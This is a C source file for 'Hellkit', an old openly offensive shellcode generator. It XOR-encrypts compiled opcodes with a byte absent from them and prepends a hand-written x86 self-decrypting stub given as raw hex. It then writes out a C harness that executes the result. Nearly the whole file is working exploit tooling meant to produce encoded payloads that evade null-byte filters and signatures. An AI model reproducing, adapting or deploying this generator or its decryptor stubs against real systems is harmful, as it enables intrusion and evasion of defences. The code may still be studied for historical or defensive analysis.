/*** Hellkit -- Stealth's own patented shellcode-generator.
 *** (C) 1999/2000 by Stealth. You may use it under the terms of
 *** the GPL.
 ***
 ***/
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <errno.h>

/* the opcode-array */
extern char opcode[];

/* how many opcodes in array */
extern int j;		

/* name of the function, the opcode-list is generated for */	
extern char hellfunction[];

FILE *hell;

char *create_byte_decryptor(char *, int, unsigned char);
char *create_word_decryptor(char *, int, unsigned char);

int main(int argc, char **argv)
{
	srand(time(NULL));
	printf("Stealth's supa-dupa hellcode-generator.\n\n");
	if (argc < 2) {
		printf("Usage: %s [hellcode-output-file] [hell-function]\n", argv[0]);
		exit(1);
	}
	if (argc < 3) {
		printf("Warning: defaulting hell-function to 'main'.\n\n");
		strcpy(hellfunction, "main");
	} else
		strcpy(hellfunction, argv[2]);
	if ((hell = fopen(argv[1], "w+")) == NULL) {
		perror("fopen");
		exit(errno);
	}
	yylex();
        fclose(hell);
	return 0;
}

int yywrap()
{
	int i = 0, zero[256], shellcode_offset = 0;
	unsigned char c, kb = 0;
	char *shellcode = NULL;
        
	memset(zero, 0, 256*sizeof(int));
	
        /* count each byte */
        for (i = 0; i < j; i++) {
           	c = (unsigned char)opcode[i];
           	zero[c]++;
        }
        
        /* find free bytes for encryption */
	for (i = 1; i < 256; i++) {
		if (zero[i] == 0) {
			kb = (unsigned char)i;
                        break;
		}
	}
	if (kb) {
		printf("using '%02x' for encryption.\n", kb);
                if (j < 256) {
                   	shellcode = create_byte_decryptor(opcode, j, kb);
                        
                        /* offset in shellcode where real hellcode begins 
                         * all bytes below this offset belong to decryptor
                         */
                        shellcode_offset = 23;
                } else {
                   	shellcode = create_word_decryptor(opcode, j, kb);
                        shellcode_offset = 25;
                }
        } else {
		printf("[FATAL] found no byte for encryption!\n");
                shellcode = opcode;
        }
        
	fprintf(hell, "/*** Generated by Stealth's hellkit v1.0\n *** Don't edit!\n ***/\n");

	/* write out decryptor */
	fprintf(hell, "\nchar hell[] =\n\"");
	for (i = 0; i < shellcode_offset; i++) {
		 c = (unsigned char)shellcode[i];
		 fprintf(hell, "\\x%02x", c);
	}
	fprintf(hell, "\"\n\"");
		 
	/* and encrypted shellcode */
	for (i = shellcode_offset; i < j + shellcode_offset; i++) {
		c = (unsigned char)shellcode[i];
                
                /* encrypt! */
		c ^= kb;
                
		fprintf(hell, "\\x%02x", c);
		
		/* break into newline if too long */
		if ((i % 19) == 0) 
			fprintf(hell, "\"\n\"");
	}
	fprintf(hell, "\";\n");
	
	/* give her a dummy-main function */
	fprintf(hell, "int main()\n{\n\tint (*f)();\n\t"
	              "f = hell;\n\t"
		      "printf(\"%cd\\n\", strlen(hell));\n\t"
		      "f();\n}\n", '%');
	return 1;
}

/* create a decryptor for shellcodes < 256 bytes
 * the shellcode will not be encrypted, this must be done
 * by the caller
 */
char *create_byte_decryptor(char *code, int len, unsigned char key_byte)
{
   	char d[] = "\xeb\x3"
                   "\x5e"
                   "\xeb\x05"
                   "\xe8\xf8\xff\xff\xff"
                   "\x83\xc6\x0d"
                   "\x31\xc9"
                   "\xb1\x0b"
                   "\x80\x36\x4d"
                   "\x46"
                   "\xe2\xfa";
        int crypt_byte_offset = 19, ecx_init_offset = 16, i = 0; 
        char *ret;
        
        if ((ret = malloc(len + strlen(d))) == NULL) {
           	perror("malloc");
                exit(errno);
        }
        memset(ret, 0, strlen(d) + len);
        d[crypt_byte_offset] = (unsigned char)key_byte;
        d[ecx_init_offset] = (unsigned char)len;
        memcpy(ret, d, strlen(d));
        
        for (i = 0; i < len; i++) {
           	ret[strlen(d) + i] = code[i];
	}
        return ret;
}

/* same as above but for shellcodes > 256 bytes
 */
char *create_word_decryptor(char *code, int len, unsigned char key_byte)
{
   	char d[] = "\xeb\x03"
                   "\x5e"
                   "\xeb\x05"
                   "\xe8\xf8\xff\xff\xff"
                   "\x83\xc6\x0f"
                   "\x31\xc9"
                   "\x66\xb9\x62\x04"
                   "\x80\x36\x4d"
                   "\x46"
                   "\xe2\xfa";
        int crypt_byte_offset = 21, ecx_init_offset = 17, i = 0;
        char *ret;
        
        if ((ret = malloc(len + strlen(d))) == NULL) {
           	perror("malloc");
                exit(errno);
        }
        memset(ret, 0, strlen(d) + len);
        d[crypt_byte_offset] = (unsigned char)key_byte;
        *((short*)&d[ecx_init_offset]) = (short)len;
        memcpy(ret, d, strlen(d));
        
        for (i = 0; i < len; i++) {
           	ret[strlen(d) + i] = code[i];
	}
        return ret;
   
}

